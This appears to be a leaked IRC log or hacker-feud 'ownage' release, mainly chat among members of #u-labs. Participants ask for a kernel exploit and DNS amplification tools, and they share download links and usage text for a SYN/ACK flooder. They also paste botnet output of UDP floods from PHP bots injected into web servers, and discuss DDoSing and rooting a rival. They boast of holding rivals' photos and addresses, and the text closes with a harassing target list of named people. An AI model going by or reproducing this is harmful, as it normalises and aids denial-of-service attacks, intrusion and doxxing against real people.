#intruders: thanks bro #u-labs: serh #u-labs: u have fighted #u-labs: with #u-labs: fiwarelli? #u-labs: naa #u-labs: lol #u-labs: with alchy #u-labs: na #u-labs: i havent fighted with fiwarelli #u-labs: fiwarelli good friend #u-labs: old #u-labs: heh eye #u-labs: o/ #u-labs: yea #u-labs: #incest #u-labs: fiwarelli is a great guy #u-labs: yes #u-labs: include- #u-labs: is on #u-labs: haha #u-labs: sk0tch #u-labs: oi #u-labs: look in blackhats #u-labs: incest #u-labs: haha #u-labs: heh #u-labs: eh do meu amigo #u-labs: tem xpl pra #u-labs: 2.6.12-9-386 #1 Mon Oct 10 13:14:36 BST 2005 i686 GNU/Linux #u-labs: W2M #u-labs: firewalli #u-labs: tinha op la #u-labs: dai falaram ke iam da gline em todos do canal #u-labs: dai vazei #u-labs: :S // 0h xgen you really know about!!! requer!!! #intruders: my wellcome #u-labs: #portugal #u-labs: pra quem quiser #u-labs: include is goin down #u-labs: then is finishd #u-labs: what do you guys think #u-labs: include is peacefull #u-labs: You want to let him go #u-labs: what about bugsb #u-labs: no #u-labs: fuck him #u-labs: i will never #u-labs: let him go #u-labs: lol #u-labs: let him burn in HELL #u-labs: haha #u-labs: oh yea #u-labs: serh for king !!! #u-labs: include- was a son of a bitch #u-labs: hehe :) #u-labs: he is fuckin crystal meth #u-labs: hoe #u-labs: let him die #u-labs: But when include is ownd #u-labs: do we wayt #u-labs: or do we make it bublic #u-labs: public ? #u-labs: fuck public #u-labs: Let him know that hes owd #u-labs: :P #u-labs: any here like include? #u-labs: na #u-labs: who u pwned? #u-labs: i hate him #u-labs: nobody in here #u-labs: likes include #u-labs: my friend warchild hates him #u-labs: include #u-labs: lol #u-labs: infact #u-labs: lsc team #u-labs: All my friends want to see him hurt #u-labs: lol :P #u-labs: badly #u-labs: lol :P #u-labs: badly #u-labs: lol #u-labs: eheeh #u-labs: mebe bratty sucks up to him #u-labs: idono #u-labs: Blowjob for packets #u-labs: yea #u-labs: rite #u-labs: Idono what it will take to own bratty #u-labs: She been ownd so many times #u-labs: she doesnt give a fuck #u-labs: what about this alchy #u-labs: [10:18pm] <@include-> lol #u-labs: [10:18pm] <@xon> lol #u-labs: [10:18pm] <@include-> who #u-labs: [10:19pm] <@alchy> Hlol #u-labs: null #u-labs: hahah #u-labs: i can see that #coma: <_coma> not much. replying to emails #coma: <_coma> going to okc tomorrow #coma: <_coma> my lil girls both have bdays this month. going to kick it with them. and bring my lil boy back #coma: <_coma> sup with u #u-labs: in #NULL #u-labs: IM packetin include- #u-labs: lool #u-labs: we need dns amplification shits #u-labs: any know any have? #u-labs: didnt we just get one #u-labs: Serh- #u-labs: dns amplificator? #u-labs: who was talkin about it #u-labs: I seen et somewhere #u-labs: i heard they had #u-labs: a dns amplificator #u-labs: labsec #u-labs: yes #u-labs: synflooders #u-labs: yeah #u-labs: 01,08:04,08) #u-labs: he use sysn shits. #u-labs: yeah, then we have it #u-labs: heh #u-labs: lol #u-labs: how ? #u-labs: with #u-labs: root machines #u-labs: * include- has quit IRC (Read error: Operation timed out) #u-labs: wasnt it with bugsb s codes ? #u-labs: www.arquivosx.xpg.com.br/c4 works #u-labs: yea #u-labs: xbugs coded #u-labs: all the shit for them #u-labs: www.arquivosx.xpg.com.br/st.bin // intranet:~/xpl/labsec# ./l // [L]OTUS I. by LabSec [SYN/ACK Packet flooder] // Usage: ./l [source] [destination] [bport] [eport] [type] [timeout] // type [1:SYN, 2:ACK] (no default) // // ops!!! #u-labs: hh #u-labs: lets try? #u-labs: me and u ? #u-labs: XgeM; can we code it into my php bot #u-labs: maybe i can look the code #u-labs: good #u-labs: 01,08;04,08p #u-labs: yeah haha #u-labs: no more include- #u-labs: Serh- #u-labs: i will join #u-labs: my eggdrop here #u-labs: set -k #u-labs: kk #u-labs: no #u-labs: nono #u-labs: spybot #u-labs: m #u-labs: no #u-labs: let the key man #u-labs: fuck eggdrops #u-labs: [17:41:57] <12XgeN> .+chan #u-labs #u-labs: [17:41:57] <05(omnipoten> That channel already exists! #u-labs: fuck em #u-labs: no need of eggs #u-labs: I dont like eggdrops #u-labs: they are so unsafe #u-labs: yes #u-labs: I cant sleep at night #u-labs: cnt #u-labs: sux to #u-labs: hehe #u-labs: yea #u-labs: took my friend 3 beers to crack that shit #u-labs: heh #u-labs: i know #u-labs: a #u-labs: guy too #u-labs: 01,08:04,08p #u-labs: Luis #u-labs: The thing is, there is 3 keys, and they fuckin manage to put them in top of every code they crypt #u-labs: lol #u-labs: [10:39pm] *** w3b (heil@216.223.56.2) has left IRC (Read error: Connection reset by peer) #u-labs: [10:40pm] *** include- (ghost@216.223.56.2) has left IRC (Read error: Operation timed out) #u-labs: [10:40pm] *** Departed (~Departed@ool-43563460.dyn.optonline.net) has joined #null #u-labs: [10:41pm] *** Departed (~Departed@ool-43563460.dyn.optonline.net) has left IRC (Killed (il-oomon (Spamming is prohibited))) #u-labs: [10:40pm] *** Departed (~Departed@ool-43563460.dyn.optonline.net) has joined #null #u-labs: [10:41pm] *** Departed (~Departed@ool-43563460.dyn.optonline.net) has left IRC (Killed (il-oomon (Spamming is prohibited))) #u-labs: [10:42pm] *** w3b (heil@216.223.56.2) has joined #null // oh themar u really got the power!!! power puff girls??? suck my dick! #u-labs: wops #u-labs: i killd w3b at the same time #u-labs: heh yea #u-labs: ye #u-labs: That`s fuckin DUAL NICE #u-labs: theyre using the same ip #u-labs: gegeg #u-labs: they're poor nice #u-labs: grab hes nick again #u-labs: they're poor now #u-labs: ill drop it 0 0 #u-labs: na #u-labs: fuck him #u-labs: later #u-labs: i dont want them #u-labs: kk #u-labs: to start ddos and shit #u-labs: heh // ohh!! serh got the power too!!!!!!!! lets kill psybnc again!! // // +-(serh@identix) // +-(~)-> killall -9 psybnc // +-(~)-> // // * Serh` has quit IRC (Connection reset by peer) // * S3r7 has quit IRC (Connection reset by peer) // // "Ops! I did'nt again!" (Britney Spears) #u-labs: they dont have that much left #u-labs: yea i know #u-labs: thei didnt manage to drop james #u-labs: when i juped it on my box #u-labs: hehe yea #u-labs: i can take off gige. #u-labs: but now no #u-labs: 01,08=04,08/ #u-labs: fucking shit machine off #u-labs: I want to jupe include on my box #u-labs: to see what say10 does to it #u-labs: after #u-labs: hhh #u-labs: he will scream #u-labs: lol #u-labs: if he deleted mine #u-labs: he sux #u-labs: mebe so, i want to see what he does #u-labs: anyways #u-labs: he is in null channel #u-labs: i guess someone invited him #u-labs: to tlak about how i get that vps there #u-labs: lol #u-labs: that sever w3b`s got #u-labs: cant handle shit #u-labs: [10:46pm] <[A]drain84991264> [udpflood]: Flood konklusjon: 19501 MB er svidd av / i gjennomsnitt: 975 MB/s #u-labs: [10:46pm] <[A]drain32406365> [udpflood]: Flood konklusjon: 18972 MB er svidd av / i gjennomsnitt: 949 MB/s #u-labs: [10:46pm] <[A]drain25613014> [udpflood]: Flood konklusjon: 5061 MB er svidd av / i gjennomsnitt: 253 MB/s #u-labs: [10:46pm] <[A]drain21332200> [udpflood]: Flood konklusjon: 5117 MB er svidd av / i gjennomsnitt: 256 MB/s #u-labs: [10:46pm] <[A]drain00294130> [udpflood]: Flood konklusjon: 5051 MB er svidd av / i gjennomsnitt: 253 MB/s #u-labs: [10:46pm] <[A]drain03106044> [udpflood]: Flood konklusjon: 5047 MB er svidd av / i gjennomsnitt: 252 MB/s #u-labs: [10:46pm] <[A]drain00294130> [udpflood]: Flood konklusjon: 5051 MB er svidd av / i gjennomsnitt: 253 MB/s #u-labs: [10:46pm] <[A]drain03106044> [udpflood]: Flood konklusjon: 5047 MB er svidd av / i gjennomsnitt: 252 MB/s #u-labs: [10:46pm] <[A]drain12053506> [udpflood]: Flood konklusjon: 5599 MB er svidd av / i gjennomsnitt: 280 MB/s // oh my god!! flood ??? #u-labs: hehe yea #u-labs: sux #u-labs: all they got #u-labs: is a gige vps #u-labs: datz how #u-labs: 3gb/ps #u-labs: they still keep #u-labs: and hes gone #u-labs: their nicknames #u-labs: ye #u-labs: 7 bots 3 gb/ps #u-labs: thats good #u-labs: kaiten ? #u-labs: No #u-labs: php bots #u-labs: mrinc = include #u-labs: mm #u-labs: looooooooooooooooooooool #u-labs: injected on to apaches #u-labs: good #u-labs: ./whois mrinc #u-labs: haha #u-labs: hehe #u-labs: DELTA #u-labs: old machines #u-labs: hahaha #u-labs: thats the same ident #u-labs: lol #u-labs: it;s hix box #u-labs: i recognize the ip #u-labs: yes #u-labs: i know too #u-labs: 0 root it #u-labs: fast #u-labs: i have #u-labs: the photos #u-labs: and the adress #u-labs: of all labsec #u-labs: 01,08:04,08) #u-labs: ugly nerd boys #u-labs: 01,08:04,08) // this is really nerds xgen!! but and u ? #u-labs: haha #u-labs: IM cute #u-labs: thenk good #u-labs: If id look anythin like say query #u-labs: Id shoot my self #u-labs: HEHE #u-labs: haha #u-labs: me manda o #u-labs: dns lotus la #u-labs: pra eu ver? #u-labs: ou nem rola ? // xgen; idiots questions 0 tolerance!!! #venetia: ACTION eu mam tirat vb cand vin #u-labs: part atack #u-labs: ? #u-labs: why u have parted #u-labs: from the chanbnel? #u-labs: It was by mistake #u-labs: IM so sorry #u-labs: lol #u-labs: I ment just to part null, chat and i dont remember that other one #u-labs: OM i forgiven ? #u-labs: This is a tinyer channel #u-labs: Its more enjoyable #u-labs: pleasant even #u-labs: ASSHO1e (gh3tt0 #u-labs: sup #u-labs: yo #u-labs: still smokin some weed #u-labs: and u #coma: gettin ready for key largo :D #coma: we leave tonight #venetia: ACTION mai e careva ? #coma: <_coma> still there? #coma: <_coma> you should be on the road if so. heh #u-labs: same #u-labs: got to go to work #u-labs: AGAIN #u-labs: Openin the shop 1 hour to urly #u-labs: Quz of some .pl dudes #u-labs: tks #u-labs: np:) #intruders: strange #intruders: :D #intruders: hi btw #intruders: wellcome ;) #intruders: thanks #intruders: whats this chan all about anyway? #intruders: lols blackhats #intruders: evil hax0rs #intruders: ! #intruders: hahahah yes #intruders: fuck evil hax0r in top #intruders: haha linuxg0d :P #intruders: hehe brb celllphoen #intruders: -l #intruders: oky dude #intruders: hi tty #intruders: r u here #intruders: ya #intruders: allmost #intruders: sleepy #intruders: and its YET a party day #intruders: shrugs // query!! keep out!!! u were hax3rs 2 times!!! |||||||||||||||||||||||||||||||||||| ||||||||||||||TARGETS||||||||||||||| |||||||||||||||||||||||||||||||||||| (x) -> MGN (we are of eye'in) (x) -> labsec = el8 pokemon requers || \/ klux = picachu; include = Eevee; deadcow = Kakuna; w3b = Meowth; fseek = Magnemite; xstalin = Slowpoke (x) -> serh (the power puff girl) (x) -> themar (w8 for ur time) (x) -> XgEn (callcenter man) (x) -> query (2 times owned... we will again) ( ) -> dtr (el8 pokemon - next target) ( ) -> SLY666 (the best requer... love colors - next target) ( ) -> S4P0 (keep el8 pokemon - next target) ( ) -> rogerinho (el8 solaris pokemon jr. - next target) = PACKET KIDDIE MASTER GAY ( ) -> bonny (even though he is a shit... everbody give ass to him - next target) |||||||||||||||||||||||||||||||||||| |||||||||||||||||||||||||||||||||||| |||||||||||||||||||||||||||||||||||| ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ thkx to ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ all blackhats! ^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ################################################ # # # # # ÛÛÛÛ ÛÛÛÛ # # ÛÛ± ÛÛ ÛÛ± ÛÛ² # # ÛÛÛ ÛÛ ±ÛÛ ±Û° °ÛÛ ÛÛ ÛÛ ±ÛÛ °ÛÛ ÛÛ° # # ÛÛ²ÛÛ ²ÛÛ °Û² °Û²ÛÛ ÛÛ °ÛÛ °Û²ÛÛ° # # ÛÛÛ ²ÛÛ °Û± ÛÛÛ ÛÛ °ÛÛ ÛÛÛ # # °ÛÛÛ± ±ÛÛ ±Û° ÛÛÛ± ÛÛ ±ÛÛ ÛÛÛ± # # ÛÛ°ÛÛ ÛÛ± ÛÛ ²Û°ÛÛ ÛÛ± ÛÛÛ ²Û°ÛÛ² # # ÛÛ² ÛÛ ÛÛÛÛ ²Û² ÛÛ ÛÛÛÛ ²Û² ÛÛ² # # # ################################################ ################################################ ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ################################################ //EOF